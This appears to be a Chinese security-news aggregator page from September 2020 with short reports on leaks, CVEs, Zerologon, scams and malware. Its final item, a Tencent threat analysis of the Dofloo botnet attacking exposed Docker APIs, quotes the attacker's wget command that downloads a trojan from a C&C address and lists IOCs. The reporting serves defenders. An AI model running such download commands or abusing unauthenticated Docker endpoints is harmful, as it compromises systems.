当前节点:hackernews.cc
时间节点
2020-09-27 20:49:47hackernews.cc
微软的Windows XP和Windows Server 2003的源代码已经在网上泄露。本周,这两个对公司而言具有历史意义的操作系统的源代码的Torrent文件已经被公布在各个文件共享网站上。这是Windows XP的源代码首次公开泄露,尽管早有消息声称这段代码已经被私下共享多年。 这些材料的真实性已经被核实,微软发言人告诉表示公司正在 “调查此事”。最新的源代码泄露不太可能对仍然停留在运行Windows XP机器的公司构成重大威胁。微软早在2014年就结束了对Windows XP的支持,不过该公司在2017年用一个极不寻常的Windows XP补丁来应对大规模的WannaCry恶意软件攻击。 这是Windows XP源代码首次公开出现,但源码并不是被严格保存的,微软曾经启动了一个特殊的政府安全计划(GSP),允许政府和组织有控制地访问源代码和其他技术内容。 这次最新的Windows XP源码泄露也并不是微软操作系统源代码第一次出现在网上。几年前至少有1GB的Windows 10相关源代码泄露,微软今年还面临一系列Xbox相关源代码的泄露。原始的Xbox和Windows NT 3.5源代码早在5月份就出现在网上,就在Xbox Series X图形源代码被盗并泄露到网上的几周后。 目前还不清楚这次泄露的源代码中包含了多少Windows XP源代码,但一位Windows内部专家称已经在其中找到了微软的NetMeeting用户证书根签密钥。 部分源代码泄露还参考了微软的Windows CE操作系统、MS-DOS以及其他泄露的微软资料。诡异的是,这些文件中还提到了比尔·盖茨的阴谋论,显然是想传播错误信息。     (稿源:cnBeta,封面源自网络。)
2020-09-27 11:00:24hackernews.cc
本次稳定版更新并不是修复存在于 Edge 中的漏洞,而是修复存在于 Chromium 浏览器中漏洞。新的稳定版本更新中修复了以下漏洞: ● CVE-2020-15960 ● CVE-2020-15961 ● CVE-2020-15962 ● CVE-2020-15963 ● CVE-2020-15964 ● CVE-2020-15965 ● CVE-2020-15966 微软将这些漏洞的严重性评级为高,建议用户尽快更新Microsoft Edge。 CVE-2020-15966是一个漏洞,它允许攻击者只使用一个精心制作的扩展程序从设备中获取敏感信息。一旦用户安装这些扩展程序,他们最终可能会读取浏览器中的敏感信息。CVE中写道:“ Chrome 85.0.4183.121 之前的版本中对扩展的策略执行不重返,允许攻击者使用特制的扩展程序来获取敏感信息。” CVE-2020-15960 本身也描述了一种非常简单的攻击方法,因为它要求攻击者只需将易受攻击的浏览器指向一个恶意的HTML页面。更具体地说,黑客可以在消息平台上或通过电子邮件向用户发送一个链接,将用户指向一个被入侵的网站托管代码,利用Chrome存储组件中的堆缓冲区溢出故障。     (稿源:cnBeta,封面源自网络。)
2020-09-27 11:00:24hackernews.cc
早些时候,美国土安全部旗下的网络与基础设施安全局(CISA)发布了有关 Windows Server 操作系统的罕见漏洞警告,因为攻击者可借此来完全控制网络上的每台计算机。此前 CISA 仅假设有黑客正在利用该漏洞,并建议系统管理员尽快部署微软八月发布的补丁更新。然而周四的时候,微软证实其已观察到新的 Windows 漏洞攻击。 作为近期曝光的最严重的 Windows 漏洞之一,按去哪研究人员证实其拿到了 10.0 的严重性评分,促使 CISA 建议所有政府机构、企业和个人立即部署微软几周前发布的修补程序。 由于 Netlogon 远程协议(MS-NRPC)漏洞太过严重,软件巨头还计划在明年初发布第二次更新,以进一步缓解这方面的隐患。 Zerologon 的危险性在于,其允许不怀好意者接管网络上的任何计算机,而无需事先窃取任何登陆凭证。攻击涉及伪造 Netlogon 的身份验证令牌,然后为所有功能敞开大门。 密码验证方案中的缺陷,使得这一切成为了可能。在被授予了度网络的访问权限之后,攻击者或借助其它恶意软件来感染计算机,并从受害设备上提取数据。 微软在本周四发布了有关此事的最新消息,称其正在积极追踪利用 CVE-2020-1472 Netlogon EoP 漏洞(简称 Zerologon)的活动,并表示已观察到有攻击者在具体实施中掺入了其它漏洞攻击。 KrebsOnSecurity 指出,该漏洞影响大多数受支持的 Windows Server 版本(从 2008 到 2019)。遗憾的是,尽管已经收到了 CISA 的警告,也不是每个人都能对其网络进行修补。 大多数 Windows 用户甚至对补丁不加理会,因而在管理员对网络进行修补之前,各企业单位和政府机构都将成为 Zerologon 攻击的潜在目标。     (稿源:cnBeta,封面源自网络。)
2020-09-27 10:40:09hackernews.cc
近日推特向开发者发布电子邮件,警告称由于 BUG 他们的私有应用密钥和账号令牌可能已经被暴露。在这份邮件中,推特表示这些私钥和令牌可能被错误地存储在浏览器的缓存中。 在电子邮件中写道:“在修复之前,如果您使用公共或共享计算机在developer.twitter.com上查看您的开发者应用程序密钥和令牌,它们可能已经暂时存储在该计算机上的浏览器缓存中。如果在那个临时时间段内,在你之后使用同一台电脑的人知道如何访问浏览器的缓存,并且知道该寻找什么,那么他们有可能访问了你查看的密钥和令牌”。 在邮件中,推特表示在某些情况下开发者自己的推特账号凭证也可能会被曝光。和密码一样,这些私钥、令牌可以被认为是一种通行密码,因为它们可以代表开发者与 Twitter 进行交互。访问令牌也是高度敏感的,因为如果被盗,它们可以让攻击者在不需要密码的情况下访问用户的账户。 Twitter表示,目前还没有看到任何证据表明这些密钥被泄露,但出于谨慎的考虑,还是提醒了开发者。邮件中说,可能使用过共享电脑的用户应该重新生成他们的应用密钥和令牌。目前还不知道有多少开发者受到该漏洞的影响,也不知道该漏洞具体何时被修复。Twitter发言人不愿意提供这方面的信息。     (稿源:cnBeta,封面源自网络。)
2020-09-25 10:42:30hackernews.cc
据彭博社报道,美国当局周四表示,在黑客使用有效的访问凭据后,一家未具名的美国联邦机构遭到了网络攻击。据美国网络安全与基础设施安全局(CISA)称,虽然没有透露有关黑客的许多细节,但联邦当局确实泄露了黑客能够浏览目录,复制至少一个文件并泄露数据的信息。 当局称,黑客植入了恶意软件,该恶意软件逃避了该机构的保护系统,并通过对多个用户的Microsoft 365帐户和域管理员帐户使用有效的访问凭据来获得对网络的访问权限。 调查人员无法确定黑客最初是如何获得证书的。但是该机构表示,黑客有可能通过利用Pulse Secure虚拟专用网络服务器中的一个已知漏洞来获取它们。 据美国国土安全部官员称,网络攻击事件与即将举行的美国大选无关。CISA是该部门的一部分。 CISA发布了有关该漏洞的技术细节,但未提供有关窃取了哪些数据或该黑客是否由一个另一个国家实施的信息。美国政府有时会公开此类“技术指标”,以便公司或其他政府可以检查自己的系统是否受到攻击。 CISA通过监视联邦民用机构的入侵检测系统意识到了这一漏洞。     (稿源:cnBeta,封面源自网络。)
2020-09-25 10:42:30hackernews.cc
据报道,Facebook公司周四向外界表示,它已经移除了三个虚假账户网络,因为俄罗斯情报部门可能利用这些账户来泄露遭黑客入侵的文件,扰乱即将到来的美国大选。该公司表示,这些账户因使用假身份和其他类型的“协同不真实行为”而被暂停使用。这些账户与俄罗斯情报部门和位于圣彼得堡的一个组织有关。美国官员曾指责该组织试图影响2016年的总统选举。 俄罗斯外交部目前尚未回应置评请求。此前,俄罗斯已一再否认试图干预美国大选,并表示不会干涉其他国家的内政。 Facebook网络安全政策负责人纳撒尼尔·格雷切(Nathaniel Gleicher)说,目前还没有证据表明被黑客攻击的文件会被泄露,但Facebook希望通过暂停这些账户来进行预防。 Facebook表示,这些网络规模很小,在Facebook和Instagram上只有少数几个账户,其中一些还冒充独立媒体和智库。这些账户总共只有97000个粉丝。 Facebook说,这些账户的目标受众是英国和美国的用户,但这些账户的地址主要位于中东和与俄罗斯接壤的国家,如叙利亚、土耳其、乌克兰和白俄罗斯等。 Twitter也表示,已与Facebook合作,确认并删除了350个由俄罗斯国有机构运营的账户。 两家公司都表示,其中一个账户网络是在联邦调查局(FBI)的举报后发现的。FBI周二警告说,外国网络犯罪分子很可能散布有关11月3日总统大选结果的假消息。 大西洋理事会(Atlantic Council)数字取证研究实验室主任格雷厄姆·布鲁克(Graham Brookie)认为,这些账户进行的一些活动表明,俄罗斯正在持续努力加剧美国和其他地区的政治紧张局势。 他说:“虽然国内虚假信息的规模和范围远远大于任何外国对手所能做到的,但来自俄罗斯的影响仍然是我们面临的一个极其严重的国家安全威胁。”     (稿源:新浪科技,封面源自网络。)
2020-09-25 10:20:33hackernews.cc
在 Zerologon 漏洞开始疯狂传播之后,美国国土安全局责令政府网络管理员责令政府网络管理员立即给 Windows Server 2008 及以上版本(包括 Windows 10 Server)打补丁。现在,微软也加入这一呼吁,表示:“微软正在积极跟踪 CVE-2020-1472 Netlogon EoP 漏洞(也被称之为 Zerologon)的活动情况,我们已经观测到有黑客利用该漏洞发起了攻击”。 该漏洞编号为 CVE-2020-1472,存在于 Windows Server 中 Active Directory 核心验证元件 Netlogon 远程协议(MS-NRPC)中,可让未经授权的攻击者借由和网域控制器建立 TCP 连线时,送入假造的 Netlogon 验证令符而登入网域控制器,进而完全掌控所有 AD 网域内的身份服务。 在 8 月的补丁星期二活动日中,微软修复了这个漏洞。虽然该漏洞的CVSS 评分为满分10分,但细节从未公开过,也就是说用户和IT 管理员从未意识到该漏洞的严重程度有多高。 CISA已发布紧急指令20-04,指示联邦文职行政部门机构对所有域控制器应用微软Windows服务器2020年8月安全更新(CVE-2020-1472)。CISA 已经指示政府服务器在9月21日(本周一)之前打好补丁,同时也强烈敦促他们在州和地方政府、私营部门以及美国公众中的合作伙伴尽快应用这一安全更新。     (稿源:cnBeta,封面源自网络。)
2020-09-24 15:46:47hackernews.cc
近几个月来,针对关键基础设施的勒索软件攻击激增,网络安全研究人员发现了一个新攻击者,该攻击者一直在尝试对俄罗斯的医疗实验室、银行、制造商和软件开发商的大型公司网络进行多阶段攻击。 这个代号为“OldGremlin”的勒索软件团伙至少自3月以来与一系列活动有关,其中包括上月8月11日发生的对一家临床诊断实验室的成功攻击。 新加坡网络安全公司Group-IB在今天发布的一份报告中说:“该组织迄今只针对俄罗斯公司。” “利用俄罗斯作为试验场,这些组织随后转移到其他地区,以减少落网的可能性。” OldGremlin的操作方式包括使用自定义后门(如TinyNode和TinyPosh下载额外的有效负载),最终目标是使用TinyCryptor勒索软件(又名Dec1pt)加密受感染系统中的文件,并以约5万美元的价格进行勒索。 另外,运营商使用代表俄罗斯RBC集团(总部位于莫斯科的主要媒体集团)发送的网络钓鱼电子邮件在网络上获得了最初的立足点,邮件主题中带有“发票”。 攻击者提供了一个恶意链接,当点击该链接会下载TinyNode恶意软件。 攻击者找到他们的出路后,对受感染计算机的进行远程访问,利用它通过Cobalt Strike在网络上横向移动并收集域管理员的身份验证数据。 在3月和4月观察到的另一种攻击变体中,我们发现攻击者使用以COVID为主题的网络钓鱼诱骗,向伪装成俄罗斯小额信贷组织的金融企业提供TinyPosh 木马。 随后,我们在8月19日发现了另一波运动,当时攻击者利用白俄罗斯正在进行的抗议活动谴责政府,发动了网络钓鱼消息,这再次证明了攻击者善于利用世界事件发起攻击。 根据Group-IB的数据,从5月到8月,OldGremlin总共落后了9个竞选活动。 Group-IB的高级数字取证分析师Oleg Skulkin说:“OldGremlin与其他讲俄语的攻击者的区别在于他们无惧在俄罗斯工作。” “这表明攻击者可能在走向全球之前就调整自身的技术以从本国优势中受益,或者它们是俄罗斯一些邻国的代表,这些邻国对俄罗斯掌握了强大的指挥权。”     稿件与封面来源:The Hacker News,译者:芋泥啵啵奶茶。 本文由 HackerNews.cc 翻译整理, 转载请注明“转自 HackerNews.cc ” 并附上原文链接。
2020-09-23 16:20:50hackernews.cc
8月9日,QuoIntelligence向其政府客户发布了一份关于有关针对北约成员(或与北约合作的国家)政府机构的(又名Sofacy,Sednit,Fancy Bear,STRONTIUM等)的警告。我们发现了一个上传到VirusTotal的恶意文件,该文件最终删除了Zebrocy恶意软件并与法国的C2通信。我们发现后,将恶意C2报告给了法国执法部门。 Zebrocy是APT28(也称为Sofacy)使用的恶意软件,在过去两年中,多家安全公司[1][2][3][4][5][6]报告了这种恶意软件。 最后,我们得出结论,这次袭击始于8月5日,至少针对位于中东的一个政府实体。但是,北约成员极有可能也观察到了同样的袭击。 … 更多内容请至Seebug Paper 阅读全文:https://paper.seebug.org/1344/       消息与封面来源:QUOINTELLIGENCE  ,译者:芋泥啵啵奶茶 本文由 HackerNews.cc 翻译整理。 转载请注明“转自 HackerNews.cc ” 并附上原文链接。
2020-09-23 15:59:33hackernews.cc
与Microsoft Bing相关的一个后端服务器暴露了搜索引擎移动应用用户的敏感数据,包括搜索查询、设备详细信息和GPS坐标等。 然而,日志数据库不包括任何个人信息,如姓名或地址。 9月12日,WizCase的Ata Hakcil发现了这一数据泄露,它是一个6.5TB的海量日志文件缓存,任何人都可以在没有任何密码的情况下访问这些文件,这有可能让攻击者利用这些信息进行敲诈和网络钓鱼诈骗。 WizCase称,服务器在9月10日之前一直受到密码保护,此后,身份验证似乎被无意中删除了。 微软安全响应中心知悉后,Windows制造商于9月16日解决了这一错误配置。 近年来,配置不当的服务器一直是数据泄露的持续来源,它会导致电子邮件地址、密码、电话号码和私人信息暴露。 WizCase的Chase Williams在周一的一篇文章中说:“基于绝对的数据量,可以安全地推测,任何在服务器暴露的情况下使用Bing搜索的人都有风险。”“我们看到了来自70多个国家的搜索记录。” 一些搜索词包括搜索儿童色情内容和他们在搜索后访问的网站,以及“与枪支相关的查询,包括购买枪支的搜索历史记录,以及‘杀死共产主义者’之类的搜索词。” 除了设备和位置的详细信息外,这些数据还包括使用移动应用程序执行搜索的确切时间、用户从搜索结果中访问的URL的部分列表以及三个唯一标识符,如ADID(Microsoft广告分配给广告的数字ID)、“deviceID”和“devicehash”。 此外,该服务器还遭受了至少两次所谓的“meow attack”,这是一次自动网络攻击,自7月以来,该攻击已从14000多个不安全的数据库实例中抹去数据,且没有任何解释。 尽管泄露的服务器没有透露姓名和其他个人信息,但WizCase警告说,这些数据可能被用于其他目的。此外,这还会让犯罪分子定位用户的行踪,用户可能会遭受人身攻击。 “无论是搜索成人内容、欺骗重要人物、极端政治观点,还是人们在必应上搜索的数百件令人尴尬的事情,”该公司表示一旦黑客掌握了搜索查询信息,他们可以根据服务器上提供的详细信息查出受害者的身份,从而使受害者容易成为敲诈的目标。”     稿件与封面来源:The Hacker News,译者:芋泥啵啵奶茶。 本文由 HackerNews.cc 翻译整理, 转载请注明“转自 HackerNews.cc ” 并附上原文链接。
2020-09-23 14:34:09hackernews.cc
据外媒报道,作为一项协调国际行动的一部分,来自世界各地的执法机构已经逮捕了179名涉嫌在暗网非法买卖商品和服务的网络罪犯分子。另外,警方还发出警告称–“暗网黄金时代已经结束”。这次协调行动由德国联邦刑事警察牵头,并得到了荷兰国家警察、英国国家犯罪署、美国司法部和FBI、欧洲刑警组织等政府机构的支持。 据悉,这场被称为Operation Disruptor的行动是继去年Wall Street Market后的又一个针对非法网络交易行动而展开的执法行动。据了解,被捕人数最多的是美国,有121人,其次是德国,42人,8人在荷兰、4人在英国、3人在奥地利、1人在瑞典被逮捕。 被逮捕的人涉嫌出售非法物品和服务,包括毒品和枪支。执法部门在逮捕行动之后缴获了超650万美元的现金和加密货币。 欧洲执法机构欧洲刑警组织在一份声明中表示:“暗网市场的黄金时代已经结束。此类行动凸显了执法部门对抗暗网市场加密和匿名的能力。警方不再只是拿下这些非法市场,他们还会追捕通过这些网站买卖非法商品的犯罪分子。暗网不再是童话–卖家和买家不再隐藏在阴影之下。” 奥地利、塞浦路斯、德国、荷兰、瑞典、澳大利亚、加拿大、英国和美国都参与了逮捕行动。目前调查仍在进行中,执法部门希望往后能逮捕到更多的人。     (稿源:cnBeta,封面源自网络。)
2020-09-22 16:11:26hackernews.cc
据外媒TechCrunch报道,众议院一位主要民主党人表示,参议院法案将强制科技公司建立后门,允许执法部门访问加密设备和数据,这对美国人来说是“非常危险的”。执法部门经常因为科技公司使用强加密技术而与科技公司发生争执,强加密技术可以保护用户数据不被黑客和窃取,但美国政府官员表示,这使其更难抓住被指控犯有严重罪行的罪犯。 苹果和谷歌等科技公司近年来加倍加强了安全工作,用连他们自己都无法解锁的加密技术保护数据安全。 参议院共和党人在6月提出了最新的 “合法访问 “法案,延续了之前的努力,迫使科技公司在出示法院命令时允许执法部门访问用户的数据。 “这对美国人来说非常危险,因为它会被黑客攻击,它会被利用,而且没有办法让它变得安全,”来自民主党的众议院议员佐伊·罗弗格伦(Zoe Lofgren)在Disrupt 2020上告诉TechCrunch。“如果我们消除加密,我们只是在向大规模的黑客和破坏开放,”她说。 罗弗格伦的评论与批评者和安全专家的评论相呼应,他们长期以来一直批评破坏加密的努力,认为没有办法为执法部门建立一个后门,而这个后门也不能被黑客利用。 立法者之前几次削弱和破坏加密的努力都失败了。目前,执法部门只能利用现有的工具和技术来寻找手机和电脑的弱点。美国联邦调查局多年来声称它有数千台设备无法进入,但在2018年承认,它一再夸大其拥有的加密设备数量,以及因此而受到负面影响的调查数量。 罗弗格伦自1995年以来一直在国会任职,在第一次所谓的“加密战争”期间,安全社区与联邦政府对抗,以限制对强加密的访问。2016年,罗弗格伦是众议院司法委员会加密工作小组的成员。该小组的最终报告是两党的,发现任何破坏加密的措施都 “有损国家利益”,但不具有约束力。 不过,这是美国政府继续推动的一个话题,甚至在今年,美国司法部长威廉·巴尔表示,美国人应该接受加密后门带来的安全风险。 “你无法安全地消除加密,”罗弗格伦告诉TechCrunch。“如果你这样做,你会给国家和美国人带来混乱,更不用说世界各地的其他人了,”她说。“这只是一件不安全的事情,我们不能允许它。”     (稿源:cnBeta,封面源自网络。)
2020-09-22 15:28:37hackernews.cc
援引外媒 Dexerto 报道,可能有超过 50 万个动视账号被入侵,包括密码在内的登录凭证信息被泄漏。动视账户主要用于追踪《使命召唤》游戏的进度,以及包括《只狼:影逝二度》等其他动视游戏,并邀请更多玩家加入。 上周日晚上,Okami 和 TheGamingRevolution 等《使命召唤》的 Insider 率先报告了动视的本次安全事件,他们称黑客攻击是持续的。TheGamingRevolution 在推文中写道:“动视的账号显然正在泄漏,所以请尽快改变你的密码,尽管这可能甚至没有帮助,因为他们每 10 分钟就会窃取 1000 个账户”。 虽然我们不知道黑客究竟是如何获得账户的访问权限,但很可能他们只是使用了蛮力的方法,因为动视账户不提供双因素认证。众多《使命召唤》玩家表示,由于黑客进入他们的动视账户并更改密码,导致无法进入他们的账户。 截至目前,还不知道黑客攻击是否还在进行中,也不知道受影响的账号情况如何,因为动视还没有就此事发表任何形式的声明,而最初透露事情经过的人也没有透露任何新的信息。 更新:在 1 个小时之前,动视发布公告,并提供了确认用户账号是否安全的指南。     (稿源:cnBeta,封面源自网络。)
2020-09-22 10:54:39hackernews.cc
微信已经成了很多人的主要联系方式,很多场合下人们已经从留电话变为加好友。微信通讯录越来越长,但里面一些人却很少联系,于是,一种所谓“微信清粉”的服务应运而生,相信很多人都收到、看到过这样的信息,甚至是使用过这样的服务。然而您不知道的是,这种方式可能威胁到您的信息安全。 年恒是一位医务工作者,今年9月的一天,他突然收到一条令他意外的微信信息。 年恒:“我点开看了之后发现,是有一段时间没联系的一个老师,她发了一条微信朋友圈,说她最近使用了一个微信清粉的服务,非常好用,底下有一条链接。当时我看到这个消息的时候我也是非常奇怪,因为我印象中老师一般不会发这种消息。” 年恒向老师发微信询问事情的原委,对方回复说她是在一个微信群中看到了一个清粉二维码,考虑到自己微信中的好友人数非常多,确实想清理好友,于是进行了尝试。 年恒:“当时(老师)摁了一下二维码识别了之后,在她自己都不知道的情况下,就往朋友圈里面发了一些消息,同时还往群里面散布了这些消息,给她自己带来非常多的麻烦。那一天下午没有做别的,就一直在解释,说自己受骗了,是扫描二维码后自动发出的。” 采访中,不少微信用户都反映他们收到过好友发送的微信清粉链接或二维码。这些微信“清粉”链接,不仅会自动在朋友圈发送广告,还可能盗取用户的个人账号信息来售卖牟利。网友黄女士在消费投诉平台“聚投诉”上反映,今年5月她在使用“清粉”服务后,很快发现微信中有一笔自己并不知情的交易,对方是某网络游戏。继而她发现,在这款从未接触过的网游中,竟有自己的实名注册账号。 微信“清粉”实为控制账号 安全风险大 那么这种所谓的“清粉”服务究竟是如何进行操作的,又会给用户带来哪些信息安全隐患? 专家表示,“清粉”的原理是通过应用集群控制软件来控制待清理的微信账户,让该账户自动向其所有好友群发消息,再由群控软件根据“信息是否能够成功发送接收”来识别其中哪些是“僵尸粉”并删除。而无论是群发消息还是拉群,都需要用户通过扫描二维码来授权清粉服务的提供者登录网页版微信。而在这背后,潜藏着巨大的风险。 数字经济智库高级研究员胡麒牧:“第一个因为你授权给他,相当于他接管了你的账户,这样他就可以调取你的个人资料,包括微信的通讯录、聊天记录,还有你手机的通讯录、聊天资料、通讯录和你的一些资料,都有可能会泄露出去;第二个他通过占有你的一个账户,他去注册一些其他的账户去做一些事情,如果这些事情是违法的,就会对你个人的一个征信带来影响;第三个他可能会通过你的账户发一些比如诈骗之类的一些信息。” 全国首例“清粉”案告破 专家提醒扫码务必谨慎 近日,江苏南通市公安局对外披露,他们在“净网2020”专项行动中成功侦破一起利用微信“清粉”软件非法获取计算机信息系统数据的案件,5名涉案犯罪嫌疑人全部落网,这也是全国破获的首例利用“清粉”软件非法获取信息的案件。 在案件侦破中,江苏南通市公安局网安支队的民警发现,围绕“清粉”软件非法获取的用户信息已经形成了一个非法倒卖的黑色产业链。 江苏省南通市通州区公安局民警曹灿华:“犯罪嫌疑人在取得微信账号的控制权限后,借机非法获取用户微信群聊二维码信息,并将这些群聊二维码以图片形式保存在服务器上。” 随后,犯罪嫌疑人再将用户微信群聊二维码等信息倒卖给下游的诈骗、赌博等犯罪团伙。短短3个月时间,该犯罪团伙共非法获取用户微信群聊二维码2000余万个,均出售给了福建龙岩等地的诈骗赌博犯罪团伙,同时还为他人批量关注微信公众号和刷阅读量、刷赞,先后获利200余万元。 江苏省南通市通州区公安局网安大队副大队长徐辉:“从非法获取微信用户的相关个人信息到下游的广告、营销和其他网络犯罪,相关的网络黑灰产已经形成一个各环节相互独立又紧密协作的产业链。” 目前,5名涉案犯罪嫌疑人因涉嫌非法获取计算机信息系统数据罪均已被执行逮捕,案件在进一步办理中。律师表示,“隐蔽性、跨地域性、证据材料不易固定等”是整治此类乱象的难点,而这些特征也增加了用户维权的难度。 北京市京师律师事务所律师孟博表示,基于“清粉”软件所潜在的巨大风险,不建议使用此类“服务”,提升防范意识,保护好个人信息;不要轻易点击不明来源的链接、二维码;在对外转账时,提前多方核实。 我们也呼吁软件开发商应该更积极地承担起监管责任,想办法从源头堵住这类行为,避免用户遭受损失。     (稿源:央视,封面源自网络。)
2020-09-21 16:26:41hackernews.cc
前言 最近一段时间,我们一直在监测一种新的恶意程序,我们称之为“Meh”。这一切都是在我们遇到大量文件时开始的,这些文件的开头是随机生成的字符串,然后是一个编译的AutoIt脚本…… 分析 Meh由两个主要部分组成。 第一部分是解密器,我们将其命名为MehCrypter,它由多个阶段组成,并作为已编译的AutoIt脚本进行分发,以随机生成的字符串序列作为前缀。AutoIt解释程序将跳过此字符串序列,该解释程序将扫描确定文件格式的字节并有效地混淆文件,而不会影响其功能。 第二部分是密码窃取程序,称为Meh。窃取程序是恶意软件的核心,并具有许多功能。它能够窃取剪贴板内容,键盘记录,窃取加密货币钱包,通过种子下载其他文件等。它几乎所有功能都在子线程中执行,这些子线程是从注入的进程执行的。在下一篇博客文章中,我们将重点介绍密码窃取器。 … 更多内容请至Seebug Paper 阅读全文:https://paper.seebug.org/1340/       消息来源:DECODED  ,封面来自于网络,译者:芋泥啵啵奶茶 本文由 HackerNews.cc 翻译整理。 转载请注明“转自 HackerNews.cc ” 并附上原文链接。
2020-09-21 15:20:06hackernews.cc
ESET安全研究人员Lukas Stefanko昨天在推特上发布了一条警报,报告显示最近披露的一个影响Android版Firefox的高危远程命令执行漏洞已被利用。 该漏洞最初由澳大利亚安全研究人员Chris Moberly发现,该漏洞存在于浏览器的SSDP引擎中,攻击者可以利用该漏洞将安装了Firefox的Android手机锁定为与攻击者连接到同一Wi-Fi网络的Android手机上。 SSDP是简单服务发现协议(Simple Service Discovery Protocol)的缩写,它是UPnP的一部分,用于查找网络上的其他设备。在Android中,Firefox会定期向连接到同一网络的其他设备发送SSDP发现消息,寻找第二个屏幕设备。 本地网络上的任何设备都可以响应这些广播并提供一个位置来获取UPnP设备的详细信息,然后Firefox尝试访问该位置,期望找到符合UPnP规范的XML文件。 视频链接:https://thehackernews.com/2020/09/firefox-android-wifi-hacking.html Moberly提交给Firefox团队的漏洞报告显示,受害者的Firefox浏览器的SSDP引擎可以通过简单地用一条指向Android意图URI的特制消息替换响应包中XML文件的位置,从而诱使其触发Android恶意命令。 为此,连接到目标Wi-Fi网络的攻击者可以在其设备上运行恶意SSDP服务器,并通过Firefox在附近的Android设备上触发恶意命令,这些过程无需与受害者进行任何交互。 哪些恶意命令包括自动启动浏览器和打开任何已定义的URL,据研究人员称,这足以诱使受害者提供其凭据、安装恶意应用程序以及基于周围场景的其他恶意活动。 Moberly表示,“目标只需在手机上运行Firefox应用程序。他们不需要访问任何恶意网站或点击任何恶意链接。不需要中间攻击者或安装恶意应用程序。他们只需在咖啡厅中使用Wi-Fi喝咖啡,攻击者就会控制他们的设备启动应用程序URI。” 视频链接:https://thehackernews.com/2020/09/firefox-android-wifi-hacking.html “它类似于网络钓鱼攻击,在这种攻击中,恶意网站会在他们不知情的情况下强行攻击目标,使受害者输入一些敏感信息或同意安装恶意应用程序。” Moberly在几周前向Firefox团队报告了这个漏洞,Firefox浏览器制造商目前已经在Firefox Android 80及更高版本中修补了这个漏洞。 Moberly还向公众发布了一个概念验证漏洞,Stefanko曾在上述视频中针对连接到同一网络的三个设备演示了该漏洞。   稿件与封面来源:The Hacker News,译者:芋泥啵啵奶茶。 本文由 HackerNews.cc 翻译整理, 转载请注明“转自 HackerNews.cc ” 并附上原文链接。
2020-09-21 10:45:38hackernews.cc
感谢腾讯御见威胁情报中心来稿! 原文链接:https://mp.weixin.qq.com/s/ceNfVRneGGIkbFOqItU11g  一、概述 腾讯安全威胁情报中心检测到Dofloo(AESDDoS)僵尸网络正批量扫描和攻击Docker容器。部分云主机上部署的Docker容器没有针对远程访问做安全认证,存在Remote API允许未授权使用漏洞且暴露在公网,导致黑客通过漏洞入侵并植入Dofloo僵尸网络木马。 云计算兴起后,服务器硬件扩展非常便利,软件服务部署成为了瓶颈,Docker作为开源的引擎可以轻松地为任何应用创建一个轻量级的、可移植的、自给自足的容器,因而逐渐得到广泛应用。 而开发者在部署Docker时未对相关服务进行正确合理的配置导致其容易成为黑客入侵的路径之一,之前已有H2Miner利用Docker漏洞进行入侵挖矿的案例被披露(https://mp.weixin.qq.com/s/iNq8SdTZ9IrttAoQYLJw5A)。此次Dofloo僵尸网络入侵系统后,会搜集系统敏感信息并加密上传,接收C&C服务器指令,执行各类DDoS攻击。 腾讯安全系列产品已支持检测Dofloo(AESDDoS)僵尸网络的最新变种,企业安全运维人员如果发现已经中招,可对照分析报告的详细内容,将攻击者下载安装的文件和启动项删除,再参考以下安全响应清单进行排查,修复Remote API允许未授权使用的漏洞,避免再次遭遇入侵。 具体响应清单如下: 应用 场景 安全产品 解决方案 威 胁 情 报 腾讯T-Sec 威胁情报云查服务 (SaaS) 1)Dofloo僵尸网络相关IOCs已入库。 各类安全产品可通过“威胁情报云查服务”提供的接口提升威胁识别能力。可参考:https://cloud.tencent.com/product/tics 腾讯T-Sec 高级威胁追溯系统 1)Dofloo僵尸网络相关信息和情报已支持检索。 网管可通过威胁追溯系统,分析日志,进行线索研判、追溯网络入侵源头。T-Sec高级威胁追溯系统的更多信息,可参考:https://cloud.tencent.com/product/atts 云原生安全 防护 云防火墙 (Cloud Firewall,CFW) 基于网络流量进行威胁检测与主动拦截,已支持: 1)Dofloo僵尸网络关联的IOCs已支持识别检测; 2)检测Docker未授权访问漏洞利用攻击。   有关云防火墙的更多信息,可参考: https://cloud.tencent.com/product/cfw 腾讯T-Sec  主机安全 (Cloud Workload Protection,CWP) 1)已支持查杀Dofloo僵尸网络相关木马程序; 2)已支持Docker Daemon 2375管理端口开启的风险项检测。 腾讯主机安全(云镜)提供云上终端的防毒杀毒、防入侵、漏洞管理、基线管理等。关于T-Sec主机安全的更多信息,可参考:https://cloud.tencent.com/product/cwp 腾讯T-Sec 安全运营中心 基于客户云端安全数据和腾讯安全大数据的云安全运营平台。已接入腾讯主机安全(云镜)、腾讯御知等产品数据导入,为客户提供漏洞情报、威胁发现、事件处置、基线合规、及泄漏监测、风险可视等能力。 关于腾讯T-Sec安全运营中心的更多信息,可参考:https://s.tencent.com/product/soc/index.html 非云企业安全防护 腾讯T-Sec 高级威胁检测系统 (腾讯御界) 1)已支持通过协议检测Dofloo僵尸网络与服务器的网络通信; 2)检测Docker未授权访问漏洞利用攻击; 3)检测DDoS攻击流量;   关于T-Sec高级威胁检测系统的更多信息,可参考: https://cloud.tencent.com/product/nta 二、样本分析 在此次攻击中,攻击者首先通过向端口2375(与Docker守护进程通信的默认端口)发送TCP SYN数据包对给定的IP范围进行批量扫描。确定开放端口的目标IP后,发送请求调用/containers/json接口获取正在运行中的容器列表,之后使用Docker EXEC命令执行以下shell访问公开主机中所有正在运行的容器并下载木马Linux2.7。 获取容器列表: 针对运行状态的容器利用Docker EXEC执行木马下载命令: wget -P /tmp/ http[:]//49.235.238.111:88/Linux2.7 被下载的Dofloo僵尸网络木马Linux2.7会连接到49.235.238.111:48080来发送和接收来自攻击者的远程shell命令。 Dofloo僵尸网络还会在从被感染系统窃取信息,包括操作系统版本,CPU型号、速度和类型。 通过将自身路径写入/etc/rc.local、/etc/rc.d/rc.local、/etc/init.d/boot.local文件中以添加为自启动项。 使用AES算法对窃取的系统信息和命令和控制(C&C)数据进行加密。 此Dofloo变种能够发起各种类型的DDoS攻击,包括DNS、SYN,LSYN,UDP,UDPS,TCP和CC Flood。 IOCs C&C 49.235.238.111:48080 175.24.123.205: 48080 IP 49.235.238.111 89.40.73.126 175.24.123.205 URL http[:]//49.235.238.111[:]88/Linux2.7 http[:]//49.235.238.111/Lov.sh http[:]//49.235.238.111/lix http[:]//49.235.238.111/Verto http[:]//49.235.238.111[:]88/NgYx http[:]//49.235.238.111/linux-arm http[:]//49.235.238.111/shre.sh 